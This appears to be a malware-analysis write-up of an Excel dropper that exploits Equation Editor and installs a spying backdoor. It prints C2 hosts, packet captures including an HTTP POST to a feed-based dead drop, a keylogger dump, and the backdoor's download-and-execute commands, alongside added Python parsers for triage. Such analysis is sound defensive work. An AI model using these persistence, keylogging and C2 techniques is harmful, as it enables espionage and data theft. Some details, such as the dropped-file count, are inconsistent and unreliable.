Excel document equipped with CVE 2017-1188

SPY / BACKDOOR, INDO-PAK CONFLICT

This vulnerability lives in the Equation Editor component and in the way it handles the equation data structure. The purpose of this component is to insert and modify equations in a document, i.e. in MS Word, Excel, etc. The main issue is the handling of objects in memory: by corrupting those objects the adversary can execute arbitrary malicious code in the address space of the vulnerable application. The vulnerable application, eqnedt32.exe, is a very old, outdated binary that was compiled and linked without any security switches (no exploit mitigations at all). It seems like the vulnerability is within MS Office; however, the component is launched from the DCOM server, which puts it outside the scope of MS Office (NOT AN MS OFFICE VULNERABILITY). Eqnedt32 is an out-of-process COM server.


In short, CVE 2017-1188 is a stack overflow in the handling of the equation data structure, and the overwritten return path ends up reaching the WinExec() function.

The exploit is used as a dropper ONLY. EQNEDT32.EXE calls the following functions:


    RtlInitUnicodeStringEx ( 0x0018e9b0, "C:\Users\foo\AppData\Roaming\MSBuild.exe" );

    Where 0x0018e9b0 is the address of the UNICODE_STRING structure that is initialised to point at the source string (the path of the file to drop).


NtCreateFile is then used to create the executable on disk:


    NtCreateFile ( 0x0018e9d0, FILE_READ_ATTRIBUTES | GENERIC_WRITE | SYNCHRONIZE, ObjectAttributes, IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_CREATE, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0 ) 


Here is some more info on the dropped file:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

LINES: 461

WORDS: 3696

CHARS: 192271

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

MD5   : 0f4f6913c3aa57b1fc5c807e0bc060fc

SHA256: 4ec1856bd5819a7edc96ec40c51acaa9d3045e2d0ea5f83459a4901371caf074

SHA1  : 00e02cba2d4f2aaabce64ed0c9c153c63bb9233e

COMPILE-TIME

Persistence:

The dropper adds the following registry value for persistence:


    lollipop   ->     C:\Users\foo\AppData\Roaming\MSBuild.exe


The second stage backdoor doesn’t start right away. It executes once the user logs off and logs in again.

MSBuild.exe uses socket calls to connect to the C2 server, going through InternetOpenUrlW().


The backdoor checks for internet access by connecting to the Wikipedia website.

=========================== (UDURRANI) =================================


(LAYER: 4)

s_port: 53 |d_port: 64548 |len=64548 

    4F 78 81 80 00 01 00 02 00 00 00 00 02 65 6E 09         Ox.?.........en.

    77 69 6B 69 70 65 64 69 61 03 6F 72 67 00 00 01         wikipedia.org...

    00 01 C0 0C 00 05 00 01 00 00 00 05 00 11 04 64         ...............d

    79 6E 61 09 77 69 6B 69 6D 65 64 69 61 C0 19 C0         yna.wikimedia...

    2E 00 01 00 01 00 00 00 05 00 04 5B C6 AE C0            ...........[...



=========================== (UDURRANI) =================================

(INIT) SYN PACKET SENT FROM 172.16.223.129    TO IP ADDRESS 91.198.174.192

    PORT INFORMATION (49544, 443)

    SEQUENCE INFORMATION (2254584484, 0)

    |URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (66)




=========================== (UDURRANI) =================================

(SYN ACK ) PACKET SENT FROM 91.198.174.192    TO IP ADDRESS 172.16.223.129

    PORT INFORMATION (443, 49544)

    SEQUENCE INFORMATION (1061382590, 2254584485)


    |URG:0 | ACK:1 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (60)

    00 00                                                   ..



=========================== (UDURRANI) =================================

(ACKN) ACK PACKET SENT FROM 172.16.223.129    TO IP ADDRESS 91.198.174.192

    PORT INFORMATION (49544, 443)

    SEQUENCE INFORMATION (2254584485, 1061382591)

    |URG:0 | ACK:1 | PSH:0 | RST:0 | SYN:0 | FIN:0|

    (60)

    00 00 00 00 00 00                                       ......




It connects to the following C2 servers to get further instructions.




=========================== (UDURRANI) =================================


(LAYER: 4)

s_port: 53 |d_port: 61213 |len=61213 

    94 46 81 80 00 01 00 01 00 00 00 00 05 6E 6F 64         .F.?.........nod

    65 32 06 66 65 65 64 34 33 03 63 6F 6D 00 00 01         e2.feed43.com...

    00 01 C0 0C 00 01 00 01 00 00 00 05 00 04 2D 21         ..............-!

    42 55                                                   BU



=========================== (UDURRANI) =================================

(INIT) SYN PACKET SENT FROM 172.16.223.132    TO IP ADDRESS 45.33.66.85

    PORT INFORMATION (49388, 80)

    SEQUENCE INFORMATION (480995858, 0)

    |URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (66)



=========================== (UDURRANI) =================================

(DATA PUSH!) IS COMING FROM 172.16.223.132    TO IP ADDRESS 45.33.66.85

    PORT INFORMATION (49388, 80)

    SEQUENCE INFORMATION (480995859, 2124736550)


    |URG:0 | ACK:1 | PSH:1 | RST:0 | SYN:0 | FIN:0|

    (376)

    50 4F 53 54 20 2F 30 30 35 36 32 33 34 31 37 38         POST /0056234178

    35 31 35 31 33 31 2E 78 6D 6C 20 48 54 54 50 2F         515131.xml HTTP/

    31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 61 70 70         1.1..Accept: app

    6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66         lication/x-www-f

    6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A         orm-urlencoded..

    43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70         Content-Type: ap

    70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D         plication/x-www-

    66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D         form-urlencoded.

    0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 55 73 65         .User-Agent: Use

    72 41 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35         rAgent:Mozilla/5

    2E 30 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E         .0(Windows NT 6.

    31 3B 57 4F 57 36 34 29 41 70 70 6C 65 57 65 62         1;WOW64)AppleWeb

    4B 69 74 2F 35 33 37 2E 31 28 4B 48 54 4D 4C 2C         Kit/537.1(KHTML,

    6C 69 6B 65 20 47 65 63 6B 6F 29 43 68 72 6F 6D         like Gecko)Chrom

    65 2F 32 31 2E 30 2E 31 31 38 30 2E 37 35 53 61         e/21.0.1180.75Sa

    66 61 72 69 2F 35 33 37 2E 31 0D 0A 48 6F 73 74         fari/537.1..Host

    3A 20 6E 6F 64 65 32 2E 66 65 65 64 34 33 2E 63         : node2.feed43.c

    6F 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67         om..Content-Leng

    74 68 3A 20 30 0D 0A 43 61 63 68 65 2D 43 6F 6E         th: 0..Cache-Con

    74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A         trol: no-cache..

    0D 0A                                                   ..




    73 63 72 69 70 74 69 6F 6E 3E 3C 21 5B 43 44 41         scription><![CDA

    54 41 5B 5B 5B 59 7A 6C 68 59 6D 4D 31 4E 6D 4A         TA[[[YzlhYmM1NmJ

    6A 5A 54 68 69 4D 47 56 68 59 54 52 6B 4E 47 52         jZThiMGVhYTRkNGR

    68 5A 44 68 6B 4E 47 56 6C 4E 57 4E 6D 59 7A 5A         hZDhkNGVlNWNmYzZ

    6A 4E 6D 4E 68 4F 47 4A 6A 4E 54 49 30 59 32 59         jNmNhOGJjNTI0Y2Y

    34 4E 44 67 30 4D 6A 4D 3D 5D 5D 5D 5D 3E 3C 2F         4NDg0MjM=]]]]></

    64 65 73 63 72 69 70 74 69 6F 6E 3E 0A 20 20 20         description>.   

    20 3C 6C 61 73 74 42 75 69 6C 64 44 61 74 65 3E          <lastBuildDate>

    54 75 65 2C 20 31 33 20 41 75 67 20 32 30 31 39         Tue, 13 Aug 2019

    20 30 35 3A 31 37 3A 34 39 20 47 4D 54 3C 2F 6C          05:17:49 GMT</l

    61 73 74 42 75 69 6C 64 44 61 74 65 3E 0A 20 20         astBuildDate>.  

    20 20 3C 67 65 6E 65 72 61 74 6F 72 3E 46 65 65           <generator>Fee

    64 34 33 20 50 72 6F 78 79 2F 31 2E 30 20 28 77         d43 Proxy/1.0 (w

    77 77 2E 66 65 65 64 34 33 2E 63 6F 6D 29 3C 2F         ww.feed43.com)</

    67 65 6E 65 72 61 74 6F 72 3E 0A 20 20 20 20 3C         generator>.    <

    74 74 6C 3E 33 36 30 3C 2F 74 74 6C 3E 0A 0A 3C         ttl>360</ttl>..<

    69 74 65 6D 3E 0A 3C 67 75 69 64 20 69 73 50 65         item>.<guid isPe

    72 6D 61 4C 69 6E 6B 3D 22 66 61 6C 73 65 22 3E         rmaLink="false">

    34 37 31 32 64 31 66 64 34 32 32 66 64 63 36 62         4712d1fd422fdc6b

    33 36 61 35 65 32 38 66 64 61 66 39 32 37 33 32         36a5e28fdaf92732

    3C 2F 67 75 69 64 3E 0A 3C 70 75 62 44 61 74 65         </guid>.<pubDate

    3E 54 75 65 2C 20 31 33 20 41 75 67 20 32 30 31         >Tue, 13 Aug 201

    39 20 30 35 3A 31 37 3A 34 39 20 47 4D 54 3C 2F         9 05:17:49 GMT</

    70 75 62 44 61 74 65 3E 0A 3C 74 69 74 6C 65 3E         pubDate>.<title>

    61 73 64 66 20 41 62 6F 75 74 20 61 73 64 66 20         asdf About asdf 

    57 68 61 74 20 69 73 20 61 73 64 66 20 3F 20 61         What is asdf ? a

    73 64 66 20 46 6F 72 75 6D 73 3C 2F 74 69 74 6C         sdf Forums</titl

    65 3E 0A 3C 64 65 73 63 72 69 70 74 69 6F 6E 3E         e>.<description>

    3C 21 5B 43 44 41 54 41 5B 3C 70 3E 3C 73 75 62         <![CDATA[<p><sub

    3E 3C 69 3E 2D 2D 20 44 65 6C 69 76 65 72 65 64         ><i>-- Delivered

    20 62 79 20 3C 61 20 68 72 65 66 3D 22 68 74 74          by <a href="htt

    70 3A 2F 2F 66 65 65 64 34 33 2E 63 6F 6D 2F 22         p://feed43.com/"

    3E 46 65 65 64 34 33 3C 2F 61 3E 20 73 65 72 76         >Feed43</a> serv

    69 63 65 3C 2F 69 3E 3C 2F 73 00 00 00 00 00 00         ice</i></s......
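The feed43 response above carries its payload inside the channel &lt;description&gt; CDATA, wrapped in [[ ]]. The following is an added example (not from the original post and not the backdoor's own code) that extracts and base64-decodes that blob from an RSS document constructed to mirror the captured one; what the backdoor does with the decoded string is not covered on this page.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed RSS document in the layout of the feed43 reply captured above.
# The base64 blob and the visible fields are copied from the dump; the rest
# of the feed (which the capture cuts off) is trimmed away.
SAMPLE_FEED = """<rss version="2.0"><channel>
<title>asdf</title>
<description><![CDATA[[[YzlhYmM1NmJjZThiMGVhYTRkNGRhZDhkNGVlNWNmYzZjNmNhOGJjNTI0Y2Y4NDg0MjM=]]]]></description>
<generator>Feed43 Proxy/1.0 (www.feed43.com)</generator>
<ttl>360</ttl>
<item>
<guid isPermaLink="false">4712d1fd422fdc6b36a5e28fdaf92732</guid>
<title>asdf About asdf What is asdf ? asdf Forums</title>
<description><![CDATA[<p><sub><i>-- Delivered by <a href="http://feed43.com/">Feed43</a> service</i></sub></p>]]></description>
</item>
</channel></rss>"""

# A dead-drop blob as it appears in the capture: "[[" + base64 + "]]".
BLOB_RE = re.compile(r"\[\[([A-Za-z0-9+/=]+)\]\]")


def extract_dead_drop(feed_xml):
    """Return the decoded bytes of every [[base64]] blob found in any
    <description> element of the feed (channel or item level)."""
    root = ET.fromstring(feed_xml)
    found = []
    for desc in root.iter("description"):
        for m in BLOB_RE.finditer(desc.text or ""):
            try:
                # validate=True rejects anything that is not clean base64,
                # so ordinary bracketed text in a feed is not mistaken for a drop
                found.append(base64.b64decode(m.group(1), validate=True))
            except ValueError:
                continue
    return found


if __name__ == "__main__":
    for blob in extract_dead_drop(SAMPLE_FEED):
        print(len(blob), blob)
```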




=========================== (UDURRANI) =================================


(LAYER: 4)

s_port: 53 |d_port: 55487 |len=55487 

    29 D6 81 80 00 01 00 01 00 00 00 00 03 32 33 31         )..?.........231

    02 33 38 02 32 38 03 31 33 39 07 69 6E 2D 61 64         .38.28.139.in-ad

    64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C         dr.arpa.........

    00 01 00 00 00 05 00 1D 03 31 33 39 02 32 38 02         .........139.28.

    33 38 03 32 33 31 0D 64 65 6C 74 61 68 6F 73 74         38.231.deltahost

    2D 70 74 72 00                                          -ptr.



=========================== (UDURRANI) =================================

(INIT) SYN PACKET SENT FROM 172.16.223.132    TO IP ADDRESS 139.28.38.231

    PORT INFORMATION (49392, 80)

    SEQUENCE INFORMATION (3546314215, 0)

    |URG:0 | ACK:0 | PSH:0 | RST:0 | SYN:1 | FIN:0|

    (66)
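The three DNS replies captured above (the Wikipedia connectivity check, the node2.feed43.com C2 lookup and the reverse lookup of 139.28.38.231) can be decoded with a small response parser that follows the C0 xx compression pointers visible in the dumps. The code below is an added example, not the author's capture tool; its input bytes are transcribed from the hex dumps on this page.

```python
import struct
from ipaddress import IPv4Address

# DNS replies transcribed from the hex dumps above (constructed test input
# copied from this page's captures, not read from a live socket).
WIKIPEDIA_DNS = bytes.fromhex(
    "4F788180000100020000000002656E0977696B697065646961036F7267000001"
    "0001C00C000500010000000500110464796E610977696B696D65646961C019C0"
    "2E000100010000000500045BC6AEC0")
FEED43_DNS = bytes.fromhex(
    "944681800001000100000000056E6F6465320666656564343303636F6D000001"
    "0001C00C000100010000000500042D214255")
PTR_DNS = bytes.fromhex(
    "29D681800001000100000000033233310233380232380331333907696E2D6164"
    "6472046172706100000C0001C00C000C000100000005001D0331333902323802"
    "3338033233310D64656C7461686F73742D70747200")

TYPE_NAMES = {1: "A", 5: "CNAME", 12: "PTR"}


def read_name(msg, off):
    """Decode a DNS name at `off`, following 0xC0xx compression pointers
    (the dumps use C0 0C, C0 19 and C0 2E). Returns (name, offset just
    past the name as laid out in place, i.e. past the first pointer)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                    # pointer: 14-bit offset
            end = end if end is not None else off + 2
            off = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            return ".".join(labels), end if end is not None else off
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def parse_answers(msg):
    """Return [(owner_name, type_name, rdata)] for each answer record; rdata is
    a dotted IPv4 string for A records and a name for CNAME/PTR records."""
    _, flags, qdcount, ancount = struct.unpack_from("!4H", msg, 0)
    if not flags & 0x8000:
        raise ValueError("not a DNS response")
    off = 12
    for _ in range(qdcount):                         # skip the question section
        _, off = read_name(msg, off)
        off += 4                                     # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10                                    # TYPE, CLASS, TTL, RDLENGTH
        if rtype == 1:
            rdata = str(IPv4Address(msg[off:off + 4]))
        elif rtype in (5, 12):
            rdata, _ = read_name(msg, off)
        else:
            rdata = msg[off:off + rdlen].hex()
        answers.append((name, TYPE_NAMES.get(rtype, str(rtype)), rdata))
        off += rdlen
    return answers
```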





Let’s look at the flow

The backdoor starts looking for certain files. It uses FindFirstFileW(), then lstrcmpW() to look for the following extensions:


  • XLSX
  • DOCX
  • PPTX
  • TXT
  • PDF



Data Theft


The backdoor calls GetTempPathA(260, &buffer_pointer_1), followed by

                   CreateFileA(&buffer_pointer_1, 0x40000000 /* GENERIC_WRITE */, 0x0, 0x0, 0x2 /* CREATE_ALWAYS */, 0x80 /* FILE_ATTRIBUTE_NORMAL */, 0x0)

Three files are dropped in the %TEMP% location:


  • 9PT568.dat
  • TPX498.dat
  • edg499.dat
  • TPX499.dat


TPX498 is used to capture keystrokes in real time. Open windows and applications are also recorded:


00000020: 3000 3000 3000 3400 3000 3900 0a00 0a00  0.0.0.4.0.9.....

00000030: 3200 3000 3100 3900 2f00 3000 3800 2f00  2.0.1.9./.0.8./.

00000040: 3100 3400 2000 3100 3100 3a00 3100 3500  1.4. .1.1.:.1.5.

00000050: 3a00 3400 3300 2000 2d00 2000 7b00 4300  :.4.3. .-. .{.C.

00000060: 3a00 5c00 5700 6900 6e00 6400 6f00 7700  :.\.W.i.n.d.o.w.

00000070: 7300 5c00 7300 7900 7300 7400 6500 6d00  s.\.s.y.s.t.e.m.

00000080: 3300 3200 5c00 6300 6d00 6400 2e00 6500  3.2.\.c.m.d...e.

00000090: 7800 6500 7d00 0a00 5b00 4500 4e00 5400  x.e.}...[.E.N.T.

000000a0: 4500 5200 5d00 0a00 0a00 3200 3000 3100  E.R.].....2.0.1.

000000b0: 3900 2f00 3000 3800 2f00 3100 3400 2000  9./.0.8./.1.4. .

000000c0: 3100 3100 3a00 3100 3500 3a00 3500 3700  1.1.:.1.5.:.5.7.

000000d0: 2000 2d00 2000 7b00 5300 7400 6100 7200   .-. .{.S.t.a.r.

000000e0: 7400 2000 6d00 6500 6e00 7500 7d00 0a00  t. .m.e.n.u.}...

000000f0: 6e00 6f00 7400 6500 7000 6100 6400 5b00  n.o.t.e.p.a.d.[.

00000100: 4500 4e00 5400 4500 5200 5d00 0a00 0a00  E.N.T.E.R.].....

00000110: 3200 3000 3100 3900 2f00 3000 3800 2f00  2.0.1.9./.0.8./.

00000120: 3100 3400 2000 3100 3100 3a00 3100 3500  1.4. .1.1.:.1.5.

00000130: 3a00 3500 3900 2000 2d00 2000 7b00 5500  :.5.9. .-. .{.U.

00000140: 6e00 7400 6900 7400 6c00 6500 6400 2000  n.t.i.t.l.e.d. .

00000150: 2d00 2000 4e00 6f00 7400 6500 7000 6100  -. .N.o.t.e.p.a.

00000160: 6400 7d00 0a00 5b00 5300 4800 4900 4600  d.}...[.S.H.I.F.

00000170: 5400 5d00 7000 6100 7300 7300 7700 6f00  T.].p.a.s.s.w.o.

00000180: 7200 6400 3100 3200 3300 3400 3500 3600  r.d.1.2.3.4.5.6.

00000190: 5b00 5300 4800 4900 4600 5400 5d00 3700  [.S.H.I.F.T.].7.

000001a0: 5b00 5300 4800 4900 4600 5400 5d00 3600  [.S.H.I.F.T.].6.

000001b0: 5b00 5300 4800 4900 4600 5400 5d00 3500  [.S.H.I.F.T.].5.

000001c0: 5b00 5300 4800 4900 4600 5400 5d00 3400  [.S.H.I.F.T.].4.

000001d0: 5b00 5300 4800 4900 4600 5400 5d00 3300  [.S.H.I.F.T.].3.

000001e0: 5b00 5300 4800 4900 4600 5400 5d00 3200  [.S.H.I.F.T.].2.

000001f0: 5b00 4500 4e00 5400 4500 5200 5d00 0a00  [.E.N.T.E.R.]...

00000200: 0a00 3200 3000 3100 3900 2f00 3000 3800  ..2.0.1.9./.0.8.

00000210: 2f00 3100 3400 2000 3100 3100 3a00 3100  /.1.4. .1.1.:.1.

00000220: 3600 3a00 3000 3700 2000 2d00 2000 7b00  6.:.0.7. .-. .{.

00000230: 4300 3a00 5c00 5700 6900 6e00 6400 6f00  C.:.\.W.i.n.d.o.

00000240: 7700 7300 5c00 7300 7900 7300 7400 6500  w.s.\.s.y.s.t.e.

00000250: 6d00 3300 3200 5c00 6300 6d00 6400 2e00  m.3.2.\.c.m.d...


9PT568 is used to get the computer's hardware profile ID.

TPX499 is used to capture screenshots.

edg499 is used to save the paths of .TXT, .PPT, .PDF, .XLS, .DOC and .DOCX files.
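A parser for the TPX498.dat layout seen in the dump above (UTF-16LE text, one block per foreground window headed by "date time - {window title}", special keys written as [KEY] tokens), written here as an added example for triage of that artifact; the log content below is constructed in the same layout and is not the page's own dump.

```python
import re
from datetime import datetime

# Constructed sample in the layout of the TPX498.dat dump: UTF-16LE, a
# timestamped "{window title}" header, then the keystrokes for that window.
# The typed text is made up; only the layout and window titles follow the dump.
SAMPLE_LOG = (
    "00409\n\n"
    "2019/08/14 11:15:43 - {C:\\Windows\\system32\\cmd.exe}\n[ENTER]\n\n"
    "2019/08/14 11:15:57 - {Start menu}\nnotepad[ENTER]\n\n"
    "2019/08/14 11:15:59 - {Untitled - Notepad}\n[SHIFT]hello world[ENTER]\n\n"
).encode("utf-16-le")

# One record: header line, then everything up to the next header (or EOF).
RECORD_RE = re.compile(
    r"(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) - \{(?P<window>[^}]*)\}\n"
    r"(?P<keys>.*?)(?=\n\n\d{4}/\d{2}/\d{2} |\Z)", re.S)
TOKEN_RE = re.compile(r"\[([A-Z]+)\]")


def parse_keylog(raw):
    """Return [(datetime, window_title, raw_keystrokes)] from a TPX498-style
    file. Undecodable bytes are replaced so a truncated tail keeps earlier records."""
    if raw.startswith(b"\xff\xfe"):      # strip a UTF-16LE BOM if the logger wrote one
        raw = raw[2:]
    text = raw.decode("utf-16-le", errors="replace")
    records = []
    for m in RECORD_RE.finditer(text):
        stamp = datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S")
        records.append((stamp, m.group("window"), m.group("keys").strip("\n")))
    return records


def render_keys(keys):
    """Make the token stream readable: [ENTER] becomes a newline, any other
    [KEY] token is kept as <KEY> so modifier presses stay visible."""
    return TOKEN_RE.sub(lambda m: "\n" if m.group(1) == "ENTER" else f"<{m.group(1)}>", keys)


def windows_with_input(records):
    """Titles of the windows in which printable text was actually typed
    (blocks holding only special-key tokens are ignored)."""
    return [w for _, w, k in records if TOKEN_RE.sub("", k).strip()]
```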




Let’s examine how the keystrokes are captured in real-time.

The backdoor can receive instructions from the C2. E.g. if it receives the value 0x4, it will read edg499 and then delete it.

If it receives 0x21, it will use ShellExecute to spawn a specific file or command.

This would simply mean: download (InternetOpenW -> InternetOpenUrlW -> InternetReadFile), open a file handle, write, close the handles and execute.

Conclusion:


This backdoor is used to steal important documents, keystrokes, screenshots, etc. It may be linked to an Indian APT group. The backdoor uses popular or social media websites as its C2 mechanism; such websites are not flagged by most popular firewalls and IPS engines. Let’s get to the VT report for the 1st stage dropper.




STAY AWAY FROM BACKDOORS